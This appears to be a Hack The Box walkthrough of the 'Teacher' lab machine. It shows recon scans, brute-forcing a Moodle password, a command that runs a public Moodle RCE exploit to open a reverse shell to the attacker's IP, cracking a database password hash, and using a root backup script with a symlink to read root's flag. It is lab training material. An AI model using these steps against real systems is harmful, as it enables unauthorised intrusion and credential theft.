/var/log $ cat "Hack The Box - Teacher Walkthrough"

2019-04-20 | hackthebox ctf 

tl;dr

  1. Find partial credentials in a file named as image.
  2. Find the login form where those credentials can be used.
  3. Confirm the username.
  4. Burteforce the last character of the password.
  5. Find an exploit to get a reverse shell.
  6. Extract linux user password hash from SQL database.
  7. Crack the hash to get access to the user flag.
  8. Find a script being executed as root.
  9. Abuse the script to get the root flag.

Tools used: masscan, nmap, gobuster, crunch, burp, mysql, hashcat, pspy

Machine Info

Teacher Machine Info

Initial Recon

Searching for open ports with masscan just shows port 80 open. Scanning it with nmap gives us not much more information:

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
# Nmap 7.70 scan initiated Mon Mar 18 13:30:47 2019 as: nmap -p 80, -sV -sC 10.10.10.153
Nmap scan report for 10.10.10.153
Host is up (0.023s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 18 13:30:55 2019 -- 1 IP address (1 host up) scanned in 7.24 seconds

Own User

Initial Enumeration

As there’s only port 80 open, that is the only point to start. And this is what we find there:

Backhat highschool

When looking through the website we find something odd on the ‘Gallery’ site. A console output:

Console Eroor

Viewing the source of http://10.10.10.153/gallery.html we can find the responsible JavaScript:

gallery.html

Trying to open the image in the browser isn’t possible. But it’s there. Using curl to get it gives us something very useful:

5.png

Now we know that there is a ‘Giovanni’ who has the password ‘Th4C00lTheachaX’. But he forgot what X was. So next we need to find a place where we can use this information.

Finding Moodle

Doing a gobuster run we find the following directories:

0
1
2
3
4
5
6
7
8
http://10.10.10.153/images (Status: 200)
http://10.10.10.153/css (Status: 200)
http://10.10.10.153/manual (Status: 200)
http://10.10.10.153/js (Status: 200)
http://10.10.10.153/javascript (Status: 403)
http://10.10.10.153/fonts (Status: 200)
http://10.10.10.153/phpmyadmin (Status: 403)
http://10.10.10.153/moodle (Status: 200)
http://10.10.10.153/server-status (Status: 403)

/images, fonts, /css and /js gives us listings of of the files used for the website. /javascript, /phpmyadmin and /server-staus aren’t directly accessible. This leaves /moodle to explorer. And indeed there is another website:

Moodle

Moodle is aa open-source learning management platform. You can find it here. Let’s see if we can confirm that ‘giovanni’ is a valid username by using the ‘Forgotten password’ function. First by trying one that will be definitely false:

Forgotten password

The developers have thought about the possible misuse of that kind of function and only providing a very generic message to prevent username enumeration:

Forgotten password Message

Trying ‘giovanni’ anyway leads to something unexpected:

Forgotton Password Mesaage for 'giovanni'

Following the provided link for more information reveals an interesting fact: “This error is shown when the server fails to send the email to the requested email id containing details about how to reset the password. This is most likely a server issue.” So we can assume the username ‘giovanni’ is indeed valid.

Bruteforcing Giovanni’s Password

As we nearly know the complete password, bruteforcing the last missing character shouldn’t be to much of an effort. Therefore we create a custom password wordlist appending all printable characters to ‘Th4C00lTheacha’ (e.g. with crunch). Then we use Burb Intruder (Sniper attack) and set the payload to our custom wordlist and let it run. As it turns out there is all kind of different output but one sticks out:

burb Intruder Attack

So let’s confirm that ‘Th4C00lTheacha#’ is the password for ‘giovanni’ by logging in:

Succsessfull Login

Finding a Vulnerability and Exploitation

Giovanni does give th course ‘Algebra’ and apperently he want’s to do a quiz with his class tomorrow as he wrote a message to the admin:

Message to 'admin'

Taking this as a hint while searching for possible vulnerabilities we find CVE-2018-1133. Moodle prior to 3.5.0 does have a RCE vulnerability in the quiz component for math formulas. Details about it can be found in Robin Peraglie’s post Evil Teacher: Code Injection in Moodle. And there’s also a working exploit titled Moodle v3.4.1 RCE Exploit from Darryn Ten available.

Let’s give it a shot and see if it works. For the exploit we need a valid course id. The id of ‘Algebra’ is 2. We start a listener and run the exploit with the command php moodleexploit.php url=http://10.10.10.153/moodle user=Giovanni pass=Th4C00lTheacha# ip=10.10.15.146 port=42424 course=2 and if everything goes well we have a shell:

Moodle RCE and Reverse Shell

Privilege Escalation to User Flag

Unfortunately ‘www-data’ has no permission for /home/giovanni. This means we need to get the Linux password for user ‘giovanni’ (or root) to get to the user flag.

From the file /var/www/html/moodle/config.php we can find the credentials for the MariaDB database:

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
<?php  // Moodle configuration file

unset($CFG);
global $CFG;
$CFG = new stdClass();

$CFG->dbtype    = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'root';
$CFG->dbpass    = 'Welkom1!';
$CFG->prefix    = 'mdl_';
<-- snip -->

Using the MaraiDB CLI tool mysql to enumerate the contents of the database ‘moodle’ we can find a suspicious user (id = 1337) named ‘Giovannibak’:

Giovannibak password hash

hash-identifier guesses that 7a860966115182402ed06375cf0a22af is most likely a MD5 hash:

hash-identifier

Cracking the hash using hashcat -m 0 -a 0 -o giovannibak.txt giovannibak.hash /usr/share/wordlists/rockyou.txt we get expelled.

After spawning an interactive shell we can su giovanni using the password expelled and get the user flag:

Teacher User Flag

Own root

When observing what is going on in /home/giovanni/work/tmp we see an archive created and the permissions change every minute. Using pspy we find the script therefore (/usr/bin/backup.sh) which is executed as root:

0
1
2
3
4
5
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

To obtain the root flag we simply create a symbolic link in /home/giovanni/work/courses with ln -s /root/root.txt toor.txt and wait for the script to be executed. Then we have the flag in /home/giovanni/work/tmp/courses/toor.txt:

0
1
$ cat /home/giovanni/work/tmp/courses/toor.txt
4f3a--------censored--------1209

Who want’s to know more about wildcard misuse: The articles Exploiting Wildcard for Privilege Escalation and Back To The Future: Unix Wildcards Gone Wild give a good overview.